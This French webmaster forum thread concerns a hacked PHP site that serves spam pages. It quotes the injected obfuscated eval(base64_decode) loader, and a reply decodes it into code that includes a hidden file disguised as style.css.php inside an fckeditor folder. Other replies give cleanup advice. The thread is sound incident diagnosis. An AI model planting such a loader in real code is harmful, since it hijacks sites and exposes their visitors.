une truc illicite a attaqué mon site

[kyrien]

Bonjour
au passage sur mon compte google j'ai decouvri que je gagne un enorme nombre des visites sur des pages que j'ai pas crée
et ces pages sont référencés et ils ont un enorme nombre des backlinks de Pagerank elevé ce qui a transformé mon site vers un nid des visites illicites .
je suis bloké la je sais pas d'ou viens et le probléme et comment je peux l'enlever sachant que j'ai rien mis sur mon site sauf avant un mois j'avais un script d'un certain site (nom retiré par WRI...)
et j l'ai enlevé de mon index mais parfois je le trouve dans des autres pages c'est comme une maladie héréditaire .
vous pouvez m'aider svp a resoudre ces 2 problémes .

[kyrien]

voila le code que je trouve sur tous mes pages php :
<?php /**/ eval ( base64_decode ( ' aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy92YXIvd3d3L3ZpcnR1YWwvdGNoYXQtbGl2ZS5vcmcvaHRkb2NzL2FubnVhaXJlL2NsYXNzL2Zja2VkaXRvci9lZGl0b3IvZmlsZW1hbmFnZXIvYnJvd3Nlci9kZWZhdWx0L2ltYWdlcy9pY29ucy8zMi9zdHlsZS5jc3MucGhwJztpZihmaWxlX2V4aXN0cygkR0xPQkFMU1snbWZzbiddKSl7aW5jbHVkZV9vbmNlKCRHTE9CQUxTWydtZnNuJ10pO2lmKGZ1bmN0aW9uX2V4aXN0cygnZ21sJykmJmZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7b2Jfc3RhcnQoJ2Rnb2JoJyk7fX19' ) ) ; ?>
mon site est indiqué en cliquant sur le bouton www

[kyrien]

je vous donne un peu des informations sur ces liens avec le nombre des backlinks calculés par google :


index.php/?cnr=earthquake+relief+fund
8 994
index.php/?cnr=hulu+on+ps3
8 788
index.php/?cnr=irs+mileage+rate+2009
8 670
index.php/?cnr=hulu+the+office
8 591
index.php/?cnr=drudge+report+health+care
8 586
index.php/?cnr=youtube+funny
8 580
index.php/?cnr=hulu+house
8 489
index.php/?cnr=earthquake+relief
8 414
index.php/?cnr=larry+platt+military+antiques
8 227
index.php/?cnr=larry+platt+antiques
7 944
index.php/?cnr=irs+refund
7 854
index.php/?cnr=earthquake+relief+efforts
7 698
index.php/?cnr=hulu+30+rock
7 688
index.php/?cnr=hulu+movies
7 518
index.php/?cnr=earthquake+relief+indonesia
7 503
index.php/?cnr=drudge+report
7 425
index.php/?cnr=drudge+report+rss
7 354
index.php/?cnr=larry+platt+philadelphia+magazine
7 333
index.php/?cnr=drudge+report+archives
7 319
index.php/?cnr=youtube
7 239
index.php/?cnr=2010+fashion+trends+colors
7 092
index.php/?cnr=youtube+downloader
6 903
index.php/?cnr=irs
6 665
index.php/?cnr=2010+fashion+trends+insider
5 881
index.php/?cnr=2010+fashion+trends+for+men
5 790
index.php/?cnr=larry+platt
5 778
index.php/?cnr=irs+phone+number
5 764
index.php/?cnr=2010+fashion+trends+spring
5 692
http://www.tchat-live.org/
4 509
index.php/?cnr=hulu+family+guy
1 273
index.php/?cnr=2010+fashion+trends+forecast
1 226

[MaBoul]

Bonjour,

Est-ce que tu utilises php my visits ?

[epsilon74]

ton site a tout simplement été infecté, et tes visiteurs aussi au passage si ils n'ont pas un bon antivirus à jour.
maintenant d'où ça vient ??? faille dans un de tes script (courant dans les script de tchat), pc de travail infecté et comptes ftp récupéré...

[forummp3]

alors, c'est soit une faille dans tes scripts, soit un spyware/virus sur ton ordinateur qui a récupéré les mdp ftp sur ton logiciel ftp.

Fait un scan antivirus/spyware pour voir si tu trouve quelque chose, ensuite, tu re-uploader les bon fichier sans le javascript malware, et ensuite tu change le mdp ftp si tu peux, et finalement tu met tous tes fichiers et dossiers sur le serveur avec les droits 555, comme cela il sera impossible d'ecraser ou de remplacer les fichiers, tu sera tranquil le temps de chercher une eventuelle faille (si t'as les competences).

Mais avant, essaye de voir dans les logs serveur si tu vois quelque chose, pour t'aider, regarde la date et l'heure ou le fichier a été modifié, comme ca tu regarde les logs a cette date.
Si t'as un serveur dédié, regarde si personne à part toi s'est connecté au serveur.

[sypsyp]

tu utilise spip ?

[kyrien]

merci les gars

[kyrien]

tu utilise spip ?

non

[kyrien]

Bonjour,

Est-ce que tu utilises php my visits ?

oui

[loran750]

Très bien. Alors jette un oeil sur leur site officiel

- 1/ il faut le mettre à jour en version 2.4
- 2/ si tu veux le garder, c'est too bad d'autant plus qu'ils ont refondu l'application en une nouvelle qui s'appelle Piwik et qui semble superbe.

Voilà. Tu dois upgrader en piwik.

[saypee]

Ce ne sont pas les recherches qui sont indexées tout simplement ?

[webMCC]

Hello

Le code que tu mentionnes au dessus est encodé en base 64.
Décodé, cela correspond à l'exploitation d'une faille fckEditor situé dans : tchat-live.org/htdocs/annuaire/class/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php
==

Code: Tout sélectionner

if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])) {
    $GLOBALS['mfsn']='/var/www/virtual/tchat-live.org/htdocs/annuaire/class/fckeditor/editor/filemanager/browser/default/images/icons/32/style.css.php';
    if(file_exists($GLOBALS['mfsn'])) {
        include_once($GLOBALS['mfsn']);
        if(function_exists('gml')&&function_exists('dgobh')) {
            ob_start('dgobh');
        }
    }   
}

==
Un bon nettoyage en profondeur s'impose...

[Neillys]

voila le code que je trouve sur tous mes pages php :
<?php /**/ eval ( base64_decode ( ' gnangnanagngnnangan ) ) ; ?>
mon site est indiqué en cliquant sur le bouton www

Tu es chez Ovh ?